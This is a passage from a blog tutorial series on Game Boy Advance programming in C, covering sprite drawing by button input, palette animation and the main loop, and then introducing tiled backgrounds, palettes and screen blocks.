<span class="n">memcpy</span><span class="p">(</span><span class="n">MEM_SCREENBLOCKS</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">&</span><span class="n">screenBlock</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">2048</span><span class="p">);</span>
<span class="n">REG_BG0_CONTROL</span> <span class="o">=</span> <span class="mh">0x0180</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Again, I’m not going to talk too much about this, because I covered it <a href="http://kylehalladay.com/blog/tutorial/2017/04/11/GBA-By-Example-3.html">last week</a>.</p>
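<p>As a quick refresher on that magic <code>0x0180</code>, here is a host-side sketch that splits a background control value into its fields. The struct and function names are made up for illustration, and the bit positions follow the usual GBA register layout as I understand it, so check them against a hardware reference before relying on them.</p>

```c
#include <stdint.h>

/* Hypothetical helper type: the fields packed into a background
   control register value. */
typedef struct {
    unsigned priority;    /* bits 0-1 */
    unsigned charBlock;   /* bits 2-3: tile block the tiles come from */
    unsigned is8bpp;      /* bit 7: 1 = 256 colour tiles */
    unsigned screenBlock; /* bits 8-12: screen block holding the map */
    unsigned size;        /* bits 14-15 */
} BgControlFields;

static BgControlFields decode_bg_control(uint16_t value)
{
    BgControlFields f;
    f.priority    = value & 0x3u;
    f.charBlock   = (value >> 2) & 0x3u;
    f.is8bpp      = (value >> 7) & 0x1u;
    f.screenBlock = (value >> 8) & 0x1Fu;
    f.size        = (value >> 14) & 0x3u;
    return f;
}
```

<p>Decoding <code>0x0180</code> this way gives 8bpp tiles read from tile block 0 and a map in screen block 1, which lines up with the two memcpy destinations in CreateBackground.</p>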
<p>Great! Now that that’s out of the way, let’s do something more interesting.</p>
<h2 id="drawing-sprites">Drawing Sprites</h2>
<p>The most obvious thing to do is to draw a different sprite depending on what button is currently pressed. This is pretty easy since we laid our sprites out sequentially in memory:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">RGB15</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">DrawSprite</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">keys</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">KEY_A</span><span class="p">,</span> <span class="n">KEY_B</span><span class="p">,</span> <span class="n">KEY_SELECT</span><span class="p">,</span>
<span class="n">KEY_START</span><span class="p">,</span> <span class="n">KEY_RIGHT</span><span class="p">,</span> <span class="n">KEY_LEFT</span><span class="p">,</span>
<span class="n">KEY_UP</span><span class="p">,</span> <span class="n">KEY_DOWN</span><span class="p">,</span> <span class="n">KEY_L</span><span class="p">,</span> <span class="n">KEY_R</span><span class="p">};</span>
<span class="kt">int</span> <span class="n">idx</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">10</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">idx</span> <span class="o">=</span> <span class="n">i</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x602F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr1</span> <span class="o">=</span> <span class="mh">0xC04F</span><span class="p">;</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr2</span> <span class="o">=</span> <span class="n">idx</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And then move the sprite off screen when we don’t want to draw any text at all:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">ClearSprite</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">volatile</span> <span class="n">ObjectAttributes</span> <span class="o">*</span><span class="n">spriteAttribs</span> <span class="o">=</span> <span class="o">&</span><span class="n">MEM_OAM</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">spriteAttribs</span><span class="o">-></span><span class="n">attr0</span> <span class="o">=</span> <span class="mh">0x60AF</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
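<p>To make the attribute values in DrawSprite and ClearSprite a bit less magical, here is a host-side sketch that pulls the interesting fields back out of attr0 and attr1. The names <code>SpriteFields</code>, <code>decode_sprite</code> and <code>is_off_screen</code> are hypothetical, and the bit positions are the standard OAM layout as far as I know.</p>

```c
#include <stdint.h>

/* Hypothetical helper type for the fields used in this article. */
typedef struct {
    unsigned y;      /* attr0 bits 0-7 */
    unsigned is8bpp; /* attr0 bit 13 */
    unsigned shape;  /* attr0 bits 14-15: 0 square, 1 wide, 2 tall */
    unsigned x;      /* attr1 bits 0-8 */
    unsigned size;   /* attr1 bits 14-15 */
} SpriteFields;

static SpriteFields decode_sprite(uint16_t attr0, uint16_t attr1)
{
    SpriteFields f;
    f.y      = attr0 & 0xFFu;
    f.is8bpp = (attr0 >> 13) & 0x1u;
    f.shape  = (attr0 >> 14) & 0x3u;
    f.x      = attr1 & 0x1FFu;
    f.size   = (attr1 >> 14) & 0x3u;
    return f;
}

/* The visible screen is 160 rows tall and y wraps at 256, so a sprite
   is hidden when it starts below row 159 and ends before the wrap. */
static int is_off_screen(unsigned y, unsigned height)
{
    return y >= 160u && y + height <= 256u;
}
```

<p>With these, <code>0x602F</code> / <code>0xC04F</code> decode to a wide, 8bpp sprite of the largest size at (79, 47), and the <code>0x60AF</code> used by ClearSprite only changes y to 175, which is below the bottom of the screen.</p>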
<h2 id="animating-palette-information">Animating Palette Information</h2>
<p>In addition to drawing a sprite, let’s animate our background. You’ll notice that the background I created earlier was just a single colour. Since the colours live in palette memory, we can change the colour of the background just by changing the first colour in the background palette.</p>
<p>To make things simpler, I just added the code to change the background colour to the DrawSprite function from above. There are certainly better / cleaner ways to do this, but for a quick and dirty example, I think the following will do.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">DrawSprite</span><span class="p">(</span><span class="n">uint16</span> <span class="n">key_code</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">bgCols</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span> <span class="n">RGB15</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span>
<span class="c1">//channels are 5 bits wide, so 31 is the largest value that fits</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">16</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">31</span><span class="p">),</span><span class="n">RGB15</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span><span class="mi">31</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span>
<span class="n">RGB15</span><span class="p">(</span><span class="mi">31</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="mi">31</span><span class="p">)};</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">bgCols</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>
<span class="p">}</span></code></pre></figure>
<p>Finally, I added a single line to the ClearSprite function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">ClearSprite</span><span class="p">()</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">MEM_BG_PALETTE</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You can do a lot of interesting things by modifying palettes directly, like having parts of sprites flash when hit, or having different enemies use the same sprite but use different colours (like the old Legend of Zelda games did with red / blue enemies). What I’ve done here is the simplest possible example of doing something like that, but it’s effective nonetheless.</p>
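<p>As a rough sketch of the "flash when hit" idea, here is one way you might blend a whole palette toward a flash colour. This is host-side code with made-up names (<code>blend15</code>, <code>flash_palette</code>), not something from the repo; on the GBA you would write the result into palette memory instead of a plain array.</p>

```c
#include <stdint.h>

/* Blend one 15-bit colour toward another.
   t runs from 0 (all `from`) to 32 (all `to`). */
static uint16_t blend15(uint16_t from, uint16_t to, uint32_t t)
{
    uint32_t r0 = from & 31u, g0 = (from >> 5) & 31u, b0 = (from >> 10) & 31u;
    uint32_t r1 = to & 31u,   g1 = (to >> 5) & 31u,   b1 = (to >> 10) & 31u;

    uint32_t r = (r0 * (32u - t) + r1 * t) / 32u;
    uint32_t g = (g0 * (32u - t) + g1 * t) / 32u;
    uint32_t b = (b0 * (32u - t) + b1 * t) / 32u;

    return (uint16_t)(r | (g << 5) | (b << 10));
}

/* Write a flashed copy of `src` into `dst`. Index 0 is copied as-is,
   since it is the transparent / backdrop entry. */
static void flash_palette(const uint16_t *src, uint16_t *dst, int count,
                          uint16_t flashCol, uint32_t t)
{
    if (count > 0)
    {
        dst[0] = src[0];
    }
    for (int i = 1; i < count; ++i)
    {
        dst[i] = blend15(src[i], flashCol, t);
    }
}
```

<p>Stepping <code>t</code> up and back down over a few frames would give a fade to white and back without touching any tile data.</p>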
<h2 id="putting-it-all-together">Putting It All Together</h2>
<p>If you’re still with me, the hard part is over, and all that’s left is to write out the main function for our program, and make sure all the necessary #defines are there for things to work together.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="c1">//previous code from article omitted for brevity</span>
<span class="cp">#define VIDEOMODE_0 0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040
#define BACKGROUND_0 0x0100
#define REG_DISPLAYCONTROL *((volatile uint16*)(0x04000000))
#define REG_VCOUNT *((volatile uint16*)(0x04000006))
</span>
<span class="kr">inline</span> <span class="kt">void</span> <span class="nf">vsync</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o">>=</span> <span class="mi">160</span><span class="p">);</span>
<span class="k">while</span> <span class="p">(</span><span class="n">REG_VCOUNT</span> <span class="o"><</span> <span class="mi">160</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">CreateBackground</span><span class="p">();</span>
<span class="n">LoadTileData</span><span class="p">();</span>
<span class="n">REG_DISPLAYCONTROL</span> <span class="o">=</span> <span class="n">VIDEOMODE_0</span> <span class="o">|</span> <span class="n">ENABLE_OBJECTS</span> <span class="o">|</span> <span class="n">BACKGROUND_0</span> <span class="o">|</span> <span class="n">MAPPINGMODE_1D</span><span class="p">;</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="n">ClearSprite</span><span class="p">();</span>
<span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vsync</span><span class="p">();</span>
<span class="n">key_poll</span><span class="p">();</span>
<span class="k">const</span> <span class="n">uint16</span> <span class="n">keys</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="n">KEY_A</span><span class="p">,</span> <span class="n">KEY_B</span><span class="p">,</span> <span class="n">KEY_SELECT</span><span class="p">,</span>
<span class="n">KEY_START</span><span class="p">,</span> <span class="n">KEY_RIGHT</span><span class="p">,</span> <span class="n">KEY_LEFT</span><span class="p">,</span>
<span class="n">KEY_UP</span><span class="p">,</span> <span class="n">KEY_DOWN</span><span class="p">,</span> <span class="n">KEY_L</span><span class="p">,</span> <span class="n">KEY_R</span><span class="p">};</span>
<span class="n">ClearSprite</span><span class="p">();</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="mi">10</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">getKeyState</span><span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span>
<span class="p">{</span>
<span class="n">DrawSprite</span><span class="p">(</span><span class="n">keys</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>If you want to grab a fully put-together, runnable version of the code, you can find it <a href="https://github.com/khalladay/GBA-By-Example/tree/master/3-UserInput">here</a>. I’m not going to paste the whole thing on this page, because all the pieces are already shown above, and I think a github repo is a far better delivery mechanism for that much code.</p>
<p>This has the disadvantage of only showing one key press at a time (and prioritizing some keys over others), but I’m ok with that, I just wanted a fun example program to show off input handling, and to provide more examples of how to use stuff we’ve done in articles past. I suppose modifying the above to show all the buttons that are currently pressed instead of one is left as an exercise to the reader? ;)</p>
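<p>If you want a head start on that exercise, here is one possible shape for it: a host-side sketch that turns a bitmask of held keys into a list of sprite indices, in the same order as the <code>keys</code> array in main. The <code>KEY_*</code> values below are the usual GBA key bits, but treat them (and the function name <code>pressed_sprite_indices</code>) as assumptions rather than what the article's header defines. The mask is assumed to have a 1 bit for each held key.</p>

```c
#include <stdint.h>

/* Assumed key bit values; the article's own defines may differ. */
enum {
    KEY_A = 0x0001, KEY_B = 0x0002, KEY_SELECT = 0x0004, KEY_START = 0x0008,
    KEY_RIGHT = 0x0010, KEY_LEFT = 0x0020, KEY_UP = 0x0040, KEY_DOWN = 0x0080,
    KEY_R = 0x0100, KEY_L = 0x0200
};

/* Fill outIdx with the sprite index of every held key and return how
   many were found. outIdx must have room for 10 entries. */
static int pressed_sprite_indices(uint16_t pressedMask, int outIdx[10])
{
    static const uint16_t keys[10] = {KEY_A, KEY_B, KEY_SELECT,
                                      KEY_START, KEY_RIGHT, KEY_LEFT,
                                      KEY_UP, KEY_DOWN, KEY_L, KEY_R};
    int count = 0;
    for (int i = 0; i < 10; ++i)
    {
        if (pressedMask & keys[i])
        {
            outIdx[count++] = i;
        }
    }
    return count;
}
```

<p>Each returned index could then drive its own entry in OAM, with a different x position per entry so the sprites don't overlap.</p>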
<h2 id="conclusion">Conclusion</h2>
<p>That’s it for this week! I’m kind of excited that we’ve covered enough ground that I can throw up some code and refer to previous articles instead of having to explain every line, but if that ended up being unclear today make sure to let me know via reddit or <a href="https://twitter.com/khalladay">twitter</a>, or wherever so I can adjust future articles.</p>
<p>Finally, as much fun as pumping these articles out every week is, I’m going to slow down a bit and do one every two weeks, so that I have more time for some other hobby projects. We’ve covered enough ground now that there’s no reason to wait around for me to post more before starting to build the GBA game of your dreams though, so get to it!</p>
<p>And as always, if you want to say hello, or ask questions, or point out mistakes I’ve made, I’m most easily reached <a href="https://twitter.com/khalladay">on Twitter</a>.</p>
GBA By Example - Drawing and Moving Backgrounds2017-04-11T00:00:00+00:00http://kylehalladay.com/blog/tutorial/gba/2017/04/11/GBA-By-Example-3<p>(Note: This is Part 3 of my GBA by Example series. A list of my other GBA tutorials can be found <a href="http://kylehalladay.com/gba.html">here</a>)</p>
<p>It’s Tuesday, which means it’s the arbitrary day of the week I chose to post GBA stuff!</p>
<p><a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">Last week</a> we got a sprite on the screen and moving around in a tiled video mode, but it still left our screen looking a little bit bare. This week we’re going to rectify that, and figure out how to work with <strong>Backgrounds</strong>! You can make really great looking stuff with backgrounds, or you can do what I did, and make something that looks like this:</p>
<div align="center">
<img src="/images/post_images/2017-04-11/bgscroll.gif" /><br />
</div>
<p>This is two backgrounds (one gradient, and one checkerboard), overlapping one another, and moving in opposite directions. Snazzy eh? Today we’re going to cover the absolute minimum you need to know to make something like that.</p>
<p>To kick things off, let’s take a look at what a background actually is on the GBA:</p>
<h2 id="introducing-backgrounds">Introducing Backgrounds</h2>
<p>Like Sprites, Backgrounds are rectangular collections of tiles. Unlike Sprites, they can be really, really big (relatively speaking). If you recall from last week, the largest sprite we can make is 64x64 pixels. Backgrounds can be up to 1024x1024 if we want them to be. Since we only have 96k of VRAM on the GBA (and 32k of that is for Sprites), it stands to reason that to fit all our background data in, they look a bit different from Sprites in memory.</p>
<p>Just like with Sprites, all colours in a Background come from a Palette, which is a collection of up to 256 different colours, each stored as a 16 bit unsigned integer. Colours on the GBA are stored with 5 bits per channel, with the highest bit ignored, like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kr">inline</span> <span class="n">uint16</span> <span class="nf">MakeCol</span><span class="p">(</span><span class="n">uint32</span> <span class="n">red</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">green</span><span class="p">,</span> <span class="n">uint32</span> <span class="n">blue</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">red</span> <span class="o">|</span> <span class="p">(</span><span class="n">green</span><span class="o"><<</span><span class="mi">5</span><span class="p">)</span> <span class="o">|</span> <span class="p">(</span><span class="n">blue</span><span class="o"><<</span><span class="mi">10</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
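<p>One thing to watch with a function like that: each channel only has 5 bits, so anything above 31 spills into the next channel. Here is a small host-side sketch of a clamped variant plus the reverse operation. Both function names are hypothetical; they aren't part of the code in the repo.</p>

```c
#include <stdint.h>

/* Pack three channels into a 15-bit colour, clamping each to 0-31
   so an oversized value can't leak into its neighbour. */
static uint16_t make_col_clamped(uint32_t red, uint32_t green, uint32_t blue)
{
    if (red > 31u)   red = 31u;
    if (green > 31u) green = 31u;
    if (blue > 31u)  blue = 31u;
    return (uint16_t)(red | (green << 5) | (blue << 10));
}

/* Split a 15-bit colour back into its channels. Bit 15 is ignored. */
static void unpack_col(uint16_t col, uint32_t *red, uint32_t *green, uint32_t *blue)
{
    *red   = col & 31u;
    *green = (col >> 5) & 31u;
    *blue  = (col >> 10) & 31u;
}
```

<p>For example, unpacking <code>0x4DA0</code> gives red 0, green 13 and blue 19.</p>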
<p>In code, a Palette might be defined like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">bgPal</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x4DA0</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0xFFFF</span><span class="p">,</span><span class="mh">0x001F</span>
<span class="p">};</span></code></pre></figure>
<p>One thing that hasn’t been mentioned in previous articles is that pixels that use the colour at index 0 are treated as transparent, so you only see the index 0 colour if nothing else gets drawn on top of that pixel. This will be important for us today because we’re going to overlap two backgrounds on top of each other.</p>
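<p>Here is a deliberately simplified, host-side model of that rule. The hardware does this per pixel for you; the function below (a made-up name, <code>resolve_pixel</code>) just shows the logic: walk the layers from front to back and take the first palette index that isn't 0.</p>

```c
#include <stdint.h>

/* layerIdx holds the palette index each layer wants at one pixel,
   ordered front to back. Index 0 means "transparent here". */
static uint16_t resolve_pixel(const uint8_t *layerIdx, int layerCount,
                              const uint16_t *palette)
{
    for (int i = 0; i < layerCount; ++i)
    {
        if (layerIdx[i] != 0)
        {
            return palette[layerIdx[i]];
        }
    }
    /* Nothing drew here, so the index 0 colour shows through. */
    return palette[0];
}
```

<p>With the four-colour palette from above, a front layer that is transparent over a back layer using index 2 resolves to <code>0xFFFF</code>, and a pixel where both layers are transparent falls back to <code>0x4DA0</code>.</p>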
<p>A Background’s tiles are the same as a Sprite’s: 8x8 grids of pixels, with each pixel stored as an index into the palette array. Backgrounds use a separate colour palette from sprites, so you can use an entirely different set of colours for your backgrounds than you do for other stuff in your game. This palette memory, just like with sprites, is large enough to store 256 colours. Since we can only have 256 possible values, tiles store each pixel as an 8 bit index. Tiles are laid out row by row, from top to bottom.</p>
<p>In code, that might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">bgTiles</span><span class="p">[</span><span class="mi">64</span><span class="p">]</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="mi">4</span><span class="p">)))</span><span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span><span class="mh">0x0101</span><span class="p">,</span><span class="mh">0x0202</span><span class="p">,</span>
<span class="p">...</span>
<span class="p">};</span></code></pre></figure>
<p>If you store your tile data in values larger than uint8s, like I did above, remember that the lowest byte in a value is the leftmost pixel.</p>
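<p>To make the byte order concrete, here is a small host-side sketch that expands one row of an 8bpp tile (four 16 bit values) into its eight palette indices, left to right. The function name <code>unpack_tile_row</code> is just for illustration.</p>

```c
#include <stdint.h>

/* One 8bpp tile row is 8 pixels = 8 bytes = 4 halfwords.
   The low byte of each halfword is the pixel further left. */
static void unpack_tile_row(const uint16_t halfwords[4], uint8_t pixels[8])
{
    for (int i = 0; i < 4; ++i)
    {
        pixels[2 * i]     = (uint8_t)(halfwords[i] & 0xFFu);
        pixels[2 * i + 1] = (uint8_t)(halfwords[i] >> 8);
    }
}
```

<p>So a value like <code>0x0201</code> means "index 1, then index 2" on screen, not the other way around.</p>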
<p>All of that should be familiar to you if you read <a href="http://kylehalladay.com/blog/tutorial/2017/04/04/GBA-By-Example-2.html">last week’s post</a>, but unlike with Sprites, the order of the tiles doesn’t matter when we’re working with backgrounds. This is because backgrounds want to re-use tiles as much as possible. To accomplish this, backgrounds use a third data structure, called a <em>Screen Block</em>, which is a collection of indices into tile memory: One 16 bit value for every 8x8 tile that the background uses.</p>
<p>Screen Blocks are always 32x32 in size, but each of these values represents an 8x8 tile, meaning that backgrounds are made up of one or more blocks of 256x256 pixels.</p>
<p>In code, a Screen Block might look something like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">short</span> <span class="n">checkerBg</span><span class="p">[</span><span class="mi">1024</span><span class="p">]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0001</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x000A</span><span class="p">,</span><span class="mh">0x001D</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span><span class="mh">0x0000</span><span class="p">,</span>
<span class="c1">//continue for another 30 rows</span></code></pre></figure>
<p>As seen here, Screen Blocks are defined row by row, top to bottom, with each value representing the index of a tile. When you’re working with 8bpp tiles, this is all there is to it. There’s more to think about in 4bpp mode, but since this is the first time we’re doing anything with backgrounds, let’s keep it simple and continue working in 8bpp mode.</p>
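<p>To make the row by row layout concrete, here is a minimal sketch of the index arithmetic. The helper names are hypothetical (they aren’t part of the gist), and the sketch uses <code>stdint.h</code> types instead of this post’s own typedefs so that it compiles on its own:</p>

```c
#include <stdint.h>

#define SCREENBLOCK_WIDTH  32 /* tiles per row in one Screen Block */
#define SCREENBLOCK_HEIGHT 32 /* rows in one Screen Block */

/* Hypothetical helper: position of the entry for tile column x, row y.
   Rows are stored one after another, so each row adds 32 entries. */
static inline uint32_t ScreenBlockIndex(uint32_t x, uint32_t y)
{
    return y * SCREENBLOCK_WIDTH + x;
}

/* Hypothetical helper: store a tile index at (x, y) in a Screen Block
   that is being built in ordinary memory before it is copied to VRAM. */
static inline void SetScreenBlockEntry(uint16_t *screenBlock,
                                       uint32_t x, uint32_t y,
                                       uint16_t tileIndex)
{
    screenBlock[ScreenBlockIndex(x, y)] = tileIndex;
}
```

<p>With this layout, the first entry of the second row sits at index 32, and the bottom right tile is entry 1023.</p>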
<p>The last thing to know is that we can only have between 0 and 4 backgrounds working at the same time. Yay hardware limitations!</p>
<p>This was a lot of theory, and I want to switch gears now and start to build some stuff, but just to recap:</p>
<ul>
<li>A Background is a rectangular collection of 8x8 tiles</li>
<li>Tiles are stored as arrays of indices into palette memory</li>
<li>To decide which tile goes where, Backgrounds use Screen Blocks, which are 32x32 arrays of indices into tile memory</li>
<li>A Background consists of one or more Screen Blocks</li>
<li>We can use between 0 and 4 backgrounds at any given time</li>
</ul>
<p><br />
Alright, let’s start putting this into practice!</p>
<h2 id="my-data">My Data:</h2>
<p>Because Screen Blocks are so large, I’ve uploaded the data (including tiles and palette) that I’m going to use today <a href="https://gist.github.com/khalladay/5d292b8d4ee7668c461821079072300d">to github</a> instead of just including it here.</p>
<p>That gist contains all the information needed to get our first background (the checkerboard) onto the screen. We’ll generate the gradient background in code below.</p>
<h2 id="getting-data-into-vram">Getting Data into VRAM</h2>
<p>We know what our data is going to look like, but we haven’t yet covered where it’s going to go. Let’s start with Palette memory, since it’s going to be the most like what we’ve done before.</p>
<p>As mentioned above, Backgrounds use a different palette than Sprites, which naturally means that the background palette is located at a different place in memory:</p>
